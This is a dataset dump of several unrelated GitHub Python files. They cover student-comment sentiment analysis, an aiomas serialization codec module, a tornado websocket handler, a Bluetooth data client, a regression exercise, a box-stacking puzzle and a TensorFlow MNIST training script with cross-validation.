row[3]\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Update comment 4\n\t\t\t\t\t\t\tif (int(row[0]) <= 16 and int(row[0]) >= 13 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[3] = article_comments[3] + row[3]\n\n\t\t\t\t\t#print the length of each(postly blog comments of each students\n\t\t\t\t\t# print(subdir, len(article_comments[0]),len(article_comments[1]),len(article_comments[2]),len(article_comments[3]))\n\n\t\t\t\tfor index, article in enumerate(article_comments):\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\t\t\t\t\t\t\t\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect comments for all students\n\t\t\t\t\t\t\tif (index == 0):\n\t\t\t\t\t\t\t\t#Collect commnets 1 for all students\n\t\t\t\t\t\t\t\tif word not in post1_dict:\n\t\t\t\t\t\t\t\t\tpost1_dict[word] = 0\n\t\t\t\t\t\t\t\tpost1_dict[word] +=1\n\n\t\t\t\t\t\t\tif (index == 1):\n\t\t\t\t\t\t\t\tif word not in post2_dict:\n\t\t\t\t\t\t\t\t\tpost2_dict[word] = 0\n\t\t\t\t\t\t\t\tpost2_dict[word] +=1\n\n\t\t\t\t\t\t\tif (index == 2):\n\t\t\t\t\t\t\t\tif word not in post3_dict:\n\t\t\t\t\t\t\t\t\tpost3_dict[word] = 0\n\t\t\t\t\t\t\t\tpost3_dict[word] +=1\n\t\t\t\t\t\t\tif (index == 3):\n\t\t\t\t\t\t\t\tif word not in post4_dict:\n\t\t\t\t\t\t\t\t\tpost4_dict[word] = 0\n\t\t\t\t\t\t\t\tpost4_dict[word] +=1\n\ndef load_comment_text():\n\tfor subdir, dirs, files in os.walk(comments_rootdir):\n\t\tfor file in files:\n\t\t\t#Create a directory for each student id\n\t\t\tif file.endswith('.txt'):\n\t\t\t\tsid = file[:-4]\n\t\t\t\tif sid not in received_comments_dicts:\n\t\t\t\t\treceived_comments_dicts[sid] = {}\n\n\t\t\t\twith open(os.path.join(subdir,file), 'r') as comments_f:\n\t\t\t\t\tarticle = comments_f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\n\t\t\t\t\t\t\tif word not in received_comments_dicts[sid]:\n\t\t\t\t\t\t\t\treceived_comments_dicts[sid][word] = 0\n\t\t\t\t\t\t\treceived_comments_dicts[sid][word] += 1\n\ndef load_lecture_text():\n\twith open(lecture_dicts_rootdir + 'total_word_dict.txt', 'rb') as lecture_f:\n\t\tlines = lecture_f.readlines()\n\t\tfor line in lines:\n\t\t\tline = line.split()\n\t\t\tif line[0] not in total_lecture_dict:\n\t\t\t\ttotal_lecture_dict[line[0]] = line[1]\n\ndef read_senti_dict():\n\twith open('senti_dict.txt', 'rb') as senti_f:\n\t\tsenti_data = json.load(senti_f)\n\treturn senti_data\n\n#After getting all the analysing text, start our analysing\n\n#First Sentiment Analysis -- personality analysis\n\ndef personality_analysis():\n\tsenti_data = read_senti_dict()\n\tfor student_name, individual_dict in student_dicts.iteritems():\n\t\tpos_score = 0\n\t\tneg_score = 0\n\t\ttext_length = 0\n\t\tfor word in individual_dict:\n\t\t\ttext_length += individual_dict[word]\n\n\t\t\tif word in senti_data:\n\t\t\t\tpos_score = pos_score + senti_data[word]['pos'] * individual_dict[word]\n\t\t\t\tneg_score = neg_score + senti_data[word]['neg'] * individual_dict[word]\n\t\t\telse:\n\t\t\t\tpos_score = pos_score + 0\n\t\t\t\tneg_score = neg_score + 
0\n\t\tif pos_score > neg_score:\n\t\t\tpolarity = 1\n\t\telif (pos_score < neg_score):\n\t\t\tpolarity = -1\n\t\telse:\n\t\t\tpolarity = 0\n\n\n\t\tprint('Student Name: ' + student_name +\n\t\t\t', Text Length ' + str(text_length) +\n\t\t\t', Personality Scores: Positive -- ' + str(pos_score/text_length * 100 * 20) + \n\t\t\t' Critical -- ' + str(neg_score/text_length * 100 * 20) +\n\t\t\t', Polarity: ' + str(polarity) + '\\n')\n\n#Second Sentiment Analysis -- comment analysis\n\ndef sentiment_analysis():\n\tsenti_data = read_senti_dict()\n\tfor sid, comment_dict in received_comments_dicts.iteritems():\n\t\tpos_score = 0\n\t\tneg_score = 0\n\t\ttext_length = 0\n\t\tfor word in comment_dict:\n\t\t\ttext_length += comment_dict[word]\n\n\t\t\tif word in senti_data:\n\t\t\t\tpos_score = pos_score + senti_data[word]['pos'] * comment_dict[word]\n\t\t\t\tneg_score = neg_score + senti_data[word]['neg'] * comment_dict[word]\n\t\t\telse:\n\t\t\t\tpos_score = pos_score + 0\n\t\t\t\tneg_score = neg_score + 0\n\t\tif pos_score > neg_score:\n\t\t\tpolarity = 1\n\t\telif (pos_score < neg_score):\n\t\t\tpolarity = -1\n\t\telse:\n\t\t\tpolarity = 0\n\n\t\tprint('Student ID: ' + sid +\n\t\t\t', Text Length ' + str(text_length) +\n\t\t\t', Sentiment Score: Positive -- ' + str(pos_score/text_length) +\n\t\t\t', Negative -- ' + str(neg_score/text_length) +\n\t\t\t', Polarity: ' + str(polarity) + '\\n')\n\n#Third Terminology Coverage Analysis -- TCA\n\ndef coverage_analysis():\n\tterminology_usage = 0\n\tterminology_coverage = 0\n\tfor student_name, individual_dict in student_dicts.iteritems():\n\n\t\tfor word in total_lecture_dict:\n\t\t\tif word in individual_dict:\n\t\t\t\tterminology_coverage += 1\n\t\t\t\tterminology_usage += individual_dict[word]\n\n\t\tprint('Student Name: ' + student_name,\n\t\t 'Terminology Coverage: ' + str(terminology_coverage), \n\t\t 'Total terminologies: ' + str(len(total_lecture_dict)))\n\t\tprint('Student Name: ' + student_name,\n\t\t 'Terminology Usage: ' + str(terminology_usage), \n\t\t 'Total terminologies: ' + str(len(total_lecture_dict)))\n\t\tprint('\\n')\n\n\n\n\nload_analysing_text()\nload_comment_text()\nload_lecture_text()\n\npersonality_analysis()\nsentiment_analysis()\ncoverage_analysis()\n\n\n\n","repo_name":"leochli/Analysis-of-Online-Learner-Reflection","sub_path":"AnalyseText.py","file_name":"AnalyseText.py","file_ext":"py","file_size_in_byte":10145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19928630185","text":"\"\"\"\nThis package imports the codecs that can be used for de- and encoding incoming\nand outgoing messages:\n\n- :class:`JSON` uses `JSON `_\n- :class:`MsgPack` uses `msgpack `_\n- :class:`MsgPackBlosc` uses `msgpack `_ and\n `Blosc `_\n\nAll codecs should implement the base class :class:`Codec`.\n\n\"\"\"\nimport inspect\nimport json\nimport sys\n\ntry:\n import blosc\nexcept ImportError:\n blosc = None\ntry:\n import msgpack\nexcept ImportError:\n msgpack = None\n\nfrom .exceptions import SerializationError\n\n\n__all__ = ['serializable', 'Codec', 'JSON', 'MsgPack', 'MsgPackBlosc']\n\n\nTYPESIZE = 8 if sys.maxsize > 2**32 else 4\n\n\ndef serializable(cls=None, repr=True):\n \"\"\"Class decorator that makes the decorated class serializable by\n :mod:`aiomas.codecs`.\n\n The decorator tries to extract all arguments to the class’ ``__init__()``.\n That means, the arguments must be available as attributes with the same\n name.\n\n The decorator adds the following methods to the 
decorated class:\n\n - ``__asdict__()``: Returns a dict with all __init__ parameters\n\n - ``__fromdict__(dict)``: Creates a new class instance from *dict*\n\n - ``__serializer__()``: Returns a tuple with args for\n :meth:`Codec.add_serializer()`\n\n - ``__repr__()``: Returns a generic instance representation. Adding this\n method can be deactivated by passing ``repr=False`` to the decorator.\n\n Example:\n\n .. code-block:: python\n\n >>> import aiomas.codecs\n >>>\n >>> @aiomas.codecs.serializable\n ... class A:\n ... def __init__(self, x, y):\n ... self.x = x\n ... self._y = y\n ...\n ... @property\n ... def y(self):\n ... return self._y\n >>>\n >>> codec = aiomas.codecs.JSON()\n >>> codec.add_serializer(*A.__serializer__())\n >>> a = codec.decode(codec.encode(A(1, 2)))\n >>> a\n A(x=1, y=2)\n\n \"\"\"\n def wrap(cls):\n attrs = [a for a in inspect.signature(cls).parameters]\n\n def __asdict__(self):\n return {a: getattr(self, a) for a in attrs}\n\n @classmethod\n def __fromdict__(cls, attrs):\n return cls(**attrs)\n\n def __repr__(self):\n args = ('{}={!r}'.format(a, getattr(self, a)) for a in attrs)\n return '{}({})'.format(self.__class__.__name__, ', '.join(args))\n\n @classmethod\n def __serializer__(cls):\n return (cls, cls.__asdict__, cls.__fromdict__)\n\n cls.__asdict__ = __asdict__\n cls.__fromdict__ = __fromdict__\n cls.__serializer__ = __serializer__\n if repr:\n cls.__repr__ = __repr__\n\n return cls\n\n # The type of \"cls\" depends on the usage of the decorator. It's a class if\n # it's used as `@serializable` but ``None`` if used as `@serializable()`.\n if cls is None:\n return wrap\n else:\n return wrap(cls)\n\n\nclass Codec:\n \"\"\"Base class for all Codecs.\n\n Subclasses must implement :meth:`encode()` and :meth:`decode()`.\n\n \"\"\"\n def __init__(self):\n self._serializers = {}\n self._deserializers = {}\n\n def __str__(self):\n return '{}[{}]'.format(\n self.__class__.__name__,\n ', '.join(s.__name__ for s in self._serializers),\n )\n\n def encode(self, data):\n \"\"\"Encode the given *data* and return a :class:`bytes` object.\"\"\"\n raise NotImplementedError\n\n def decode(self, data):\n \"\"\"Decode *data* from :class:`bytes` to the original data structure.\"\"\"\n raise NotImplementedError\n\n def add_serializer(self, type, serialize, deserialize):\n \"\"\"Add methods to *serialize* and *deserialize* objects typed *type*.\n\n This can be used to de-/encode objects that the codec otherwise\n couldn't encode.\n\n *serialize* will receive the unencoded object and needs to return\n an encodable serialization of it.\n\n *deserialize* will receive an objects representation and should return\n an instance of the original object.\n\n \"\"\"\n if type in self._serializers:\n raise ValueError(\n 'There is already a serializer for type \"{}\"'.format(type))\n typeid = len(self._serializers)\n self._serializers[type] = (typeid, serialize)\n self._deserializers[typeid] = deserialize\n\n def serialize_obj(self, obj):\n \"\"\"Serialize *obj* to something that the codec can encode.\"\"\"\n orig_type = otype = type(obj)\n if otype not in self._serializers:\n # Fallback to a generic serializer (if available)\n otype = object\n\n try:\n typeid, serialize = self._serializers[otype]\n except KeyError:\n raise SerializationError('No serializer found for type \"{}\"'\n .format(orig_type)) from None\n\n try:\n return {'__type__': (typeid, serialize(obj))}\n except Exception as e:\n raise SerializationError(\n 'Could not serialize object \"{!r}\": {}'.format(obj, e)) from e\n\n def 
deserialize_obj(self, obj_repr):\n \"\"\"Deserialize the original object from *obj_repr*.\"\"\"\n # This method is called for *all* dicts so we have to check if it\n # contains a desrializable type.\n if '__type__' in obj_repr:\n typeid, data = obj_repr['__type__']\n obj_repr = self._deserializers[typeid](data)\n return obj_repr\n\n\nclass JSON(Codec):\n \"\"\"A :class:`Codec` that uses *JSON* to encode and decode messages.\"\"\"\n\n def encode(self, data):\n return json.dumps(data, default=self.serialize_obj).encode()\n\n def decode(self, data):\n return json.loads(data.decode(), object_hook=self.deserialize_obj)\n\n\nclass MsgPack(Codec):\n \"\"\"A :class:`Codec` that uses *msgpack* to encode and decode messages.\"\"\"\n def __init__(self):\n if msgpack is None:\n msg = (\n 'Please install \"msgpack-python\" to use the {} codec: pip '\n 'install -U aiomas[mp]'.format(self.__class__.__name__)\n )\n raise ImportError(msg)\n super().__init__()\n\n def encode(self, data):\n return msgpack.packb(\n data, default=self.serialize_obj, use_bin_type=True)\n\n def decode(self, data):\n return msgpack.unpackb(data,\n object_hook=self.deserialize_obj,\n use_list=False,\n encoding='utf-8')\n\n\nclass MsgPackBlosc(Codec):\n \"\"\"A :class:`Codec` that uses *msgpack* to encode and decode messages and\n *blosc* to compress them.\"\"\"\n def __init__(self):\n if msgpack is None or blosc is None:\n msg = (\n 'Please install \"msgpack-python\" and \"blosc\" to use the {} '\n 'codec: pip install -U aiomas[mpb]'\n .format(self.__class__.__name__)\n )\n raise ImportError(msg)\n super().__init__()\n\n def encode(self, data):\n return blosc.compress(msgpack.packb(\n data, default=self.serialize_obj, use_bin_type=True), TYPESIZE)\n\n def decode(self, data):\n return msgpack.unpackb(blosc.decompress(bytes(data)),\n object_hook=self.deserialize_obj,\n use_list=False,\n encoding='utf-8')\n","repo_name":"LeonidPilyugin/LIT1533Project","sub_path":"SatelliteClasses/SatelliteClasses/Python 3.7 (32-bit)/Lib/site-packages/aiomas/codecs.py","file_name":"codecs.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23615269811","text":"from tornado import websocket\nimport json\n\n\nLinks = {\n \"clients\": [],\n \"pipeline_node\": None\n}\n\nclass WebSocketHandler(websocket.WebSocketHandler):\n \"\"\"\n - sending and recieving of config\n - sending of channel_data\n - sending processed data\n \"\"\"\n\n def open(self):\n if self not in Links[\"clients\"]:\n Links[\"clients\"].append(self)\n\n def on_message(self, message):\n if Links[\"pipeline_node\"] is not None:\n data = json.loads(message)\n Links[\"pipeline_node\"]._on_message(data)\n\n def on_close(self):\n if self in Links[\"clients\"]:\n Links[\"clients\"].remove(self)\n","repo_name":"nat-n/pybci","sub_path":"lib/webservice/websockets.py","file_name":"websockets.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23186844356","text":"from wielder.util.arguer import get_wielder_parser\n\n\nclass WieldServiceMode:\n \"\"\"\n WieldServiceMode is used for modality of service, server, microservice module\n image packing, provisioning, deployment ...\n * Optional mounting of local code to docker for development.\n * Optional opening of debug port for remote debugging.\n\n debug_mode: Optional opening of debug port for remote debugging.\n Done by allocating a port env 
variables ...\n local_mount: Optional mounting of local code to docker.\n used for local development integration with IDE.\n \"\"\"\n\n def __init__(self, debug_mode=None, local_mount=None):\n \"\"\"\n\n :param debug_mode:\n :param local_mount:\n \"\"\"\n\n wield_parser = get_wielder_parser()\n wield_args = wield_parser.parse_args()\n\n if debug_mode is None:\n debug_mode = wield_args.debug_mode\n\n if local_mount is None:\n local_mount = wield_args.local_mount\n\n self.debug_mode = debug_mode\n self.local_mount = local_mount\n\n\n","repo_name":"hamshif/Wielder","sub_path":"wielder/wield/modality.py","file_name":"modality.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31300142512","text":"import imp\nimport os, time\n#import imumsg_pb2.py\nimport socket,struct\nfrom bluetooth import *\nimport bluetooth\nfrom dataTransferServer import commonBTAdress\nfrom socketHandler import *\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nimuMsgPath = dir_path+ \"\\\\release\\\\imumsg_pb2.py\"\nprint(imuMsgPath)\nimuMsg = imp.load_source(\"imumsg_pb2\",imuMsgPath)\n\nHOST = '127.0.0.1' # Standard loopback interface address (localhost)\nPORT = 65432 # Port to listen on (non-privileged ports are > 1023)\n\nbluetoothHost = 1\nbluetoothPort = 2\n\nclass dataTransferClient(threading.Thread):\n\n\tisConnected = False\n\t#1 BlueTooth \n\tdef __init__(self, BTAdress, dataHandler):\n\t\tthreading.Thread.__init__(self)\n\t\t#self.startClientWifi()\n\t\t# self.startClientBlueTooth()\n\t\tself.serverAddress = BTAdress\n\t\tself._dataHandler = dataHandler\n\n\tdef run(self):\n\t\tself.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n\t\twhile True:\n\t\t\tif not self.isConnected:\n\t\t\t\tself.connect()\n\t\t\ttime.sleep(2)\n\n\tdef connect(self):\n\t\ttry:\n\t\t\tself.sock.connect((self.serverAddress,1))\n\t\t\tprint(\"Connected to Socket\")\n\t\t\tself.isConnected = True\n\n\n\t\t\tself._HC05LeftDataThread = socketHandler(self.sock,self, self._dataHandler)\n\t\t\tself._HC05LeftDataThread.start()\t\t\t\n\t\texcept Exception as e:\t\n\t\t\tprint(\"Server Not Avail\")\n\n\n\tdef onSocketShutdown(self):\n\t\tself.isConnected = False\n\n\t#Ran after connection is made\n\tdef controlLoop(self):\n\t\tself.sendMsg(msg)\n\t\tpass\n\n\n\tdef sendMsg(self, msg):\n\n\t\tmsgLen = len(msg)\n\n\t\t#Send the length of message. I denote max of 4 bytes or unsigned int32\n\t\tmsgLenArray = struct.pack(\"I\", msgLen)\n\n\t\tfor byte in msgLenArray:\n\t\t\tprint(\"Sending\")\n\t\t\tprint(byte)\n\t\t\tself._client.send(byte)\n\n\t\ttotalSent=0\n\t\twhile totalSent < msgLen:\n\t\t\t#Sent will always be one (as a byte is sent)\n\t\t\tsent = self._client.send(msg[totalSent])\n\t\t\ttotalSent = sent + totalSent\n\n\t\t\n\nclass sensorMsgGenerator():\n\tdef __init__(self):\n\t\tpass\n\n\tdef getMsg():\n\t\t_imuMsg = imuMsg.IMUInfo()\n\t\t_imuMsg.acc_x=float(2.0)\n\t\t_imuMsg.acc_y=float(3.524)\n\t\tprint(\"Value: %f\" %_imuMsg.acc_x)\n\t\tprint(\"Value: %f\" %_imuMsg.acc_y)\n\t\t#len(s.encode('utf-8'))\n\t\tbinaryMsg = _imuMsg.SerializeToString()\n\t\tlength = len( binaryMsg )\t\n\t\treturn binaryMsg\n\n# if __name__==\"__main__\":\n# \t#client = TCPClient()\n# \t# i = 0\n# \t# while i < 10:\n# \t# \tclient.sendMsg(getMsg())\n# \t# \ti = i + 1\n# \tbtLookUp()\n\t\n# \t#name = raw_input(\"What is your name? 
\")","repo_name":"ahmadnav/UBCCapstone","sub_path":"wirlessDataTransfer/dataTransferClient.py","file_name":"dataTransferClient.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8539070567","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 10 17:24:51 2015\n\n@author: fernanda\n\"\"\"\n#cd /Users/fernanda/Dropbox/batmelon/aprendizaje/Aprendizaje/datos\n\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf3=pd.read_csv(\"regLinPoli.csv\")\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(df3[['X','X2','X3','X4']],df3['y'],train_size=0.85)\n\nscaleX=StandardScaler()\nscaleY=StandardScaler()\nscaleX.fit(X_train)\nX_train=scaleX.transform(X_train)\nscaleY.fit(Y_train)\nY_train=scaleY.transform(Y_train)\n\n\nX_train = np.array(X_train);Y_train = np.array(Y_train)\nX_test = np.array(X_test);Y_test = np.array(Y_test)\n\nw=np.array([10.0,10.0,10.0,10.0,10.0])\n\ndef salida(w,x):\n w = np.array(w)\n x = np.array(x)\n x=np.insert(x,0,1)\n res = float(np.dot(x,w))\n return(res)\n \ndef entrena(w,X_train,Y_train,eta=0.000001):\n errores=[]\n for i in range(len(X_train)):\n errores.append(Y_train[i] - (salida(w,X_train[i]) ))\n w_anterior=np.array([element for element in w])\n new_X_train=np.insert(X_train,0,1)\n for i in range(len(w)): \n w[i] = w[i] + eta * ( Y_train[i] - (salida(w_anterior,X_train[i]) ))*new_X_train[i]\n return(errores,w)\n \nerrores,w=entrena(w,X_train,Y_train,eta=0.0000001) \n\nscaleX=StandardScaler()\nscaleY=StandardScaler()\nscaleX.fit(X_train)\nX_test=scaleX.transform(X_test)\nscaleY.fit(Y_train)\nY_test=scaleY.transform(Y_test)\n\ndef errores_test(x,y,w):\n errores_test=[]\n for i in range(len(x)):\n errores_test.append(y[i] - (salida(w,x[i]) ))\n return errores_test\n\nerrores_test=errores_test(X_test,Y_test,w) \n\nplt.plot(range(len(X_train)),errores,color='blue')\n\nplt.plot(range(len(X_test)),errores_test,color='green')","repo_name":"omisimo/machine_learning","sub_path":"Aprendizaje/grupoJueves/Regularizacion/Fer_Alcala_Regularizacion.py","file_name":"Fer_Alcala_Regularizacion.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34338029450","text":"\"\"\"\nYou have a stack of n boxes, with width w(i),height h(i), depth d(i). 
The boxes\ncannot be rotated and can only be stacked on top of one another if each box in \nthe stack is strictly larger than the box above it in width,height and depth.\n\nImplement a method to build the tallest stack possible,where the height of stack \nis the sum of the heights of each box.\n\nTime Complexity :\nSpace Complexity : \n\"\"\"\n\n__author__ = \"Ravi Kiran Chadalawada\"\n__email__ = \"rchadala@usc.edu\"\n__credits__ = [\"Cracking The coding interview\"]\n__status__ = \"Prototype\"\n\n\n\ndef find_tallest_stack(boxes, bottom):\n\t\"\"\" Returns the tallest stack\n\t\"\"\"\n\tmax_height = 0\n\tmax_stack = []\n\tfor box in boxes:\n\t\tif (is_valid(box,bottom)):\n\t\t\tcurrent_stack = find_tallest_stack(boxes, box)\n\t\t\tcurrent_height = len(current_stack)\t\n\t\t\t\n\t\t\tif current_height > max_height:\n\t\t\t\tmax_height = current_height\n\t\t\t\tmax_stack = current_stack\n\n\tif len(bottom):\n\t\tmax_stack.append(bottom)\n\n\treturn max_stack\n\ndef is_valid(box,bottom):\n\tif len(bottom) == 0:\n\t\treturn True\n\n\telif box[0] > bottom[0] and \\\n\t\t box[1] > bottom[1] and \\\n\t\t box[2] > bottom[2]:\n\t\treturn True\n\n\telse:\n\t\treturn False\n\nif __name__=='__main__':\n\n\tboxes = [[1,2,3],\n\t\t\t [4,5,6]\n\t\t\t]\n","repo_name":"ravisrhyme/CTCI","sub_path":"chapter9/9.10.py","file_name":"9.10.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"73965219753","text":"import os\r\nimport input_data\r\nimport tensorflow.compat.v1 as tf\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\ntf.logging.set_verbosity(tf.compat.v1.logging.ERROR)\r\ntf.disable_v2_behavior()\r\nfrom sklearn.model_selection import train_test_split\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom time import time\r\n\r\n# 将 numpy 数组中的图片和标签顺序打乱\r\ndef shuffer_images_and_labels(images, labels):\r\n    shuffle_indices = np.random.permutation(np.arange(len(images)))\r\n    shuffled_images = images[shuffle_indices]\r\n    shuffled_labels = labels[shuffle_indices]\r\n    return shuffled_images, shuffled_labels\r\n\r\n# 将label从长度10的one hot向量转换为0~9的数字\r\n# 例:get_label(total_labels[0]) 获取到total_labels中第一个标签对应的数字\r\ndef get_label(label):\r\n    return np.argmax(label)\r\n\r\ndef show_image(image):\r\n    tmp = np.zeros((28,28))\r\n    for i in range(len(image)):\r\n        tmp[i//28][i%28] = image[i]\r\n    plt.imshow(tmp)\r\n    plt.show()\r\n\r\n# images:训练集的feature部分\r\n# labels:训练集的label部分\r\n# batch_size: 每次训练的batch大小\r\n# epoch_num: 训练的epochs数\r\n# shuffle: 是否打乱数据\r\n# 使用示例:\r\n# for (batchImages, batchLabels) in batch_iter(images_train, labels_train, batch_size, epoch_num, shuffle=True):\r\n#     sess.run(feed_dict={inputLayer: batchImages, outputLabel: batchLabels})\r\ndef batch_iter(images,labels, batch_size, epoch_num, shuffle=True):\r\n    \r\n    data_size = len(images)\r\n    \r\n    num_batches_per_epoch = int(data_size / batch_size) # 样本数/batch块大小,多出来的“尾数”,不要了\r\n    \r\n    for epoch in range(epoch_num):\r\n        # Shuffle the data at each epoch\r\n        if shuffle:\r\n            shuffle_indices = np.random.permutation(np.arange(data_size))\r\n            \r\n            shuffled_data_feature = images[shuffle_indices]\r\n            shuffled_data_label = labels[shuffle_indices]\r\n        else:\r\n            shuffled_data_feature = images\r\n            shuffled_data_label = labels\r\n\r\n        for batch_num in range(num_batches_per_epoch): # batch_num取值0到num_batches_per_epoch-1\r\n            start_index = batch_num * batch_size\r\n            end_index = min((batch_num + 1) * batch_size, data_size)\r\n\r\n            yield 
(shuffled_data_feature[start_index:end_index] , shuffled_data_label[start_index:end_index])\r\n\r\n#FCN全卷积神经网络\r\ndef fcn_layer(inputs, # input data\r\n input_dim, # Input numbers of Neurons\r\n output_dim, # Output numbers of Neurons\r\n activation=None): # activation function\r\n # Random numbers that generate data that is more than twice the standard deviation will be replaced here\r\n W = tf.Variable(tf.truncated_normal([input_dim, output_dim], stddev=0.1))\r\n b = tf.Variable(tf.zeros([output_dim])) # init as 0\r\n\r\n XWb = tf.matmul(inputs, W) + b\r\n\r\n if activation is None:\r\n outputs = XWb\r\n else:\r\n outputs = activation(XWb)\r\n\r\n return outputs\r\n\r\n# 构建和训练模型\r\ndef train_and_test(images_train, labels_train, images_test, labels_test,\r\n images_validation, labels_validation):\r\n # Input layers (28*28*1)\r\n x = tf.placeholder(tf.float32, [None, 784], name=\"X\")\r\n # 0-9 => 10 numbers\r\n y = tf.placeholder(tf.float32, [None, 10], name=\"Y\")\r\n # 2 Hidden layers\r\n h1 = fcn_layer(inputs=x,\r\n input_dim=784,\r\n output_dim=256,\r\n activation=tf.nn.relu)\r\n h2 = fcn_layer(inputs=h1,\r\n input_dim=256,\r\n output_dim=64,\r\n activation=tf.nn.relu)\r\n # Output layers\r\n forward = fcn_layer(inputs=h2,\r\n input_dim=64,\r\n output_dim=10,\r\n activation=None)\r\n pred = tf.nn.softmax(forward)\r\n\r\n loss_function = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(logits=forward, labels=y))\r\n\r\n train_epochs = 20 # Train times\r\n batch_size = 100 # single batch train size\r\n learning_rate = 0.001 # learning rate\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss_function)\r\n\r\n correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\r\n\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n startTime = time()\r\n\r\n sess = tf.Session()\r\n init = tf.global_variables_initializer()\r\n sess.run(init)\r\n\r\n for epoch in range(train_epochs):\r\n for xs, ys in batch_iter(images_train, labels_train, batch_size, 1, shuffle=True):\r\n sess.run(optimizer, feed_dict={x: xs, y: ys})\r\n\r\n loss, acc = sess.run([loss_function, accuracy],\r\n feed_dict={x: images_test, y: labels_test})\r\n\r\n print(f\"[+] {'%02d' % (epoch + 1)}th train:\\tloss:\", \"{:.9f}\".format(loss), \"\\taccuracy:\", \"{:.4f}\".format(acc))\r\n\r\n duration = time() - startTime\r\n print(\"[+] Train finished successfully. 
It takes:\", \"{:.2f}s\".format(duration))\r\n\r\n accu_test = sess.run(accuracy, feed_dict={x: images_test, y: labels_test})\r\n accu_validation = sess.run(accuracy, feed_dict={x: images_validation, y: labels_validation})\r\n return accu_test,accu_validation\r\n\r\n# 划分数据集并调用train_and_test测试和验证\r\ndef hold_out(images, labels, train_percentage):\r\n X_train, X_test, Y_train, Y_test = train_test_split(images,\r\n labels,\r\n test_size=1 - train_percentage,\r\n random_state=1,\r\n stratify=labels)\r\n return X_train, Y_train, X_test, Y_test\r\n\r\ndef cross_validation(images, labels, k, vali_images, vali_labels):\r\n total_images = [[] for _ in range(10)]\r\n total_labels = [[] for _ in range(10)]\r\n\r\n for i in range(len(images)):\r\n index = get_label(labels[i])\r\n total_images[index].append(images[i])\r\n total_labels[index].append(labels[i])\r\n\r\n k_total_images = []\r\n k_total_labels = [] # 大小为k\r\n for i in range(10):\r\n for j in range(k):\r\n k_total_images.append(total_images[i][int(j * len(total_images[i]) / k):int((j + 1) * len(total_images[i]) / k)]) # 长度为k*10,里面的列表长度为len(total_images[i])/k\r\n k_total_labels.append(total_labels[i][int(j * len(total_images[i]) / k):int((j + 1) * len(total_images[i]) / k)])\r\n\r\n tmp_accu_test = 0\r\n tmp_accu_vali = 0\r\n for idex in range(k):\r\n X_test_images = k_total_images[idex] # 大小为1\r\n Y_test_labels = k_total_labels[idex]\r\n X_train_images = k_total_images # 大小为k-1\r\n Y_train_labels = k_total_labels\r\n del X_train_images[idex] # 大小为k-1 del删除变量\r\n del Y_train_labels[idex]\r\n\r\n f_X_train_images = []\r\n f_Y_train_labels = []\r\n\r\n for i in range(len(X_train_images)):\r\n for j in range(len(X_train_images[i])):\r\n f_X_train_images.append(X_train_images[i][j])\r\n f_Y_train_labels.append(Y_train_labels[i][j])\r\n\r\n f_X_train_images, f_Y_train_labels = np.array(f_X_train_images), np.array(f_Y_train_labels)\r\n X_test_images, Y_test_labels = np.array(X_test_images), np.array(Y_test_labels)\r\n\r\n print(\"[-] k = {},当前第{}组为测试集\".format(k, idex+1))\r\n accu_test,accu_validation = train_and_test(f_X_train_images, f_Y_train_labels, X_test_images, Y_test_labels,\r\n vali_images, vali_labels)\r\n print(\"[*] Temp accuracy of test :\", accu_test)\r\n print(\"[*] Temp accuracy of validation :\", accu_validation)\r\n tmp_accu_test += accu_test\r\n tmp_accu_vali += accu_validation\r\n\r\n print(\"[*] Average accuracy of test :\", tmp_accu_test / k)\r\n print(\"[*] Average accuracy of validation :\", 